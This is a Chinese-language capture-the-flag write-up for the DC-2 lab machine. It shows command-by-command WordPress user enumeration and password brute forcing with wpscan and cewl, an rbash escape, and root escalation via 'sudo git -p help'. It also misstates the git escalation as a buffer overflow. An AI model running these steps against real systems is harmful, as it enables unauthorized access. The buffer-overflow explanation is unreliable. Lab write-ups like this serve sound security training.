zoukankan      html  css  js  c++  java

  • 3.DC2

    DC-2

    关于环境的搭建 , 大家可以自行百度

    网络桥接

    渗透机 kali

    靶机 dc-2 需要修改/etc/hosts

    0x01. 信息收集

    1. 查看当前网段

    image-20210617192105245

    2. 扫描存活主机 , 确定靶机ip

    可以看到靶机的ip是192.168.0.131

    image-20210617193010763

    3. 扫描ip开放的端口 , 全端口

    nmap -A -T4 -p 0-65535 192.168.0.131

    image-20210617201841487

    开放的有 80 , 7744 , 这里可以看到7744端口是ssh协议 , 可以先访问一下 80 端口

    image-20210617202919995

    看到了第一个flag , 根据提示需要登录找到下一个flag , 如果找不到 , 你就换个用户登录 。

    在扫描端口的时候,发现是wordpress搭建的网站 ,我们可以使用dirsearch对网站进行目录扫描

    image-20210617204529088

    发现后台的路径 , /wp-admin/ , 这个时候我们可以使用wpscan对网站进行用户的枚举

    wpscan --url http://dc-2/ -e

    image-20210617205604580

    然后我们根据提示用cewl生成密码 ( kali下一款密码生成工具 ) , 然后通过wpscan进行爆破

    wpscan --url http://dc-2/ -U username.txt -P passwd.txt

    image-20210617211002192

    爆出两个用户 , 进行登录 , 使用tom账号登录没有发现flag2 , 然后更换jerry账号 , 在里面发现了flag2

    image-20210617211539755

    根据flag2的提示 , 让我们换一种思路 , 我们可以尝试对ssh协议进行爆破 , 可以先用得到的账号和密码试试能不能登录

    0x02. 换个思路

    1. 绕过rbash

    ssh tom@192.168.0.131 -p 7744

    image-20210617211828800

    使用 tom 账号直接就可以登录了

    tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

    在 tom 账号里面发现 flag3.txt , 但是通过cat命令无法打印 , 这里通过echo $PATH , 查看当前用户的环境变量

    发现是家目录下的usr/bin , ls 一下, 看看有哪些命令可以用

    tom@DC-2:~$ ls usr/bin
less  ls  scp  vi

可以通过vi命令 , 编辑flag3.txt , 查看文件具体内容
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

    看到这个提示估计是要切换jerry用户了

    tom@DC-2:~$ su jerry
-rbash: su: command not found

    但是提示我们没有su 命令 , 这里-rbash , 是一种被限制的shell , 通过网上寻找方法 , 通过下面的方法可以绕过

    tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=/bin
tom@DC-2:~$ su -jerry

    登录到jerry用户 , 发现flag4.txt , 然后提示我们git , 估计要通过git提权

    jerry@DC-2:~$ lsflag4.txtjerry@DC-2:~$ cat flag4.txtGood to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!).  No hints here - you're on your own now.  :-)Go on - git outta here!!!!

    2. git提权

    依旧是百度找到了提权方法

    这里用git提权,原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码即可以root权限执行这条命令。

    sudo git -p help

    image-20210617222742951

    0x03. 总结这个靶机涉及到的点

    1. linux下的hosts文件路径

    /etc/hosts

    2. cewl工具

    CeWL是一款以爬虫模式在指定URL上收集单词的工具,可以将它收集到的单词纳入密码字典,以提高密码破解工具的成功率。

    cewl http://www.ignitetechnologies.in/  //默认方法cewl http://www.ignitetechnologies.in/ -w dict.txt   //-wcewl http://www.ignitetechnologies.in/ -m 9  //生成长度至少为9的密码  -mcewl http://www.ignitetechnologies.in/ -n -e  //从网站中获取Email   -ecewl http://www.ignitetechnologies.in/ -c  //计算网站字典中重复的单词数量  -ccewl http://www.ignitetechnologies.in/ -d 3  //增加爬虫的爬取深度以生成更大的字典文件  -dcewl http://www.ignitetechnologies.in/ --debug     //提取调试信息   -debug

    3. WPScan工具

    转载两篇大佬的文章,写得挺详细的https://www.freebuf.com/sectool/88653.html 如何使用WPScan辅助渗透WordPress网站https://xz.aliyun.com/t/2794#toc-0 WPScan使用完整教程之记一次对WordPress的渗透过程

    4. linux的环境变量

    PATH变量:设定解释器搜索所执行的的命令的路径。

    export命令可以把一般变量转换成全局变量

    5. rbash逃逸

    https://xz.aliyun.com/t/7642 rbash逃逸大全

    6. git提权

    sudo git help config	!/bin/bash或者!'sh'完成提权sudo git  -p help
  • 相关阅读:
    JavaScript判断字符串的字符长度(中文占两个字符)
    MessageQueue 一 简单的创建和读取
    HttpWebResponse返回信息
    IDEA 快捷操作 Windows
    不带头结点的单链表的创建、插入、删除。
    二叉树的深度
    【Python爬虫实战】pywin32 安装后出现 import win32api ImportError DLL load failed
    【Python爬虫实战】Scrapy框架的安装 搬运工亲测有效
    【Python爬虫实战】多线程爬虫---糗事百科段子爬取
    【Python爬虫实战】微信爬虫
  • 原文地址:https://www.cnblogs.com/xcymn/p/15712492.html
Copyright © 2011-2022 走看看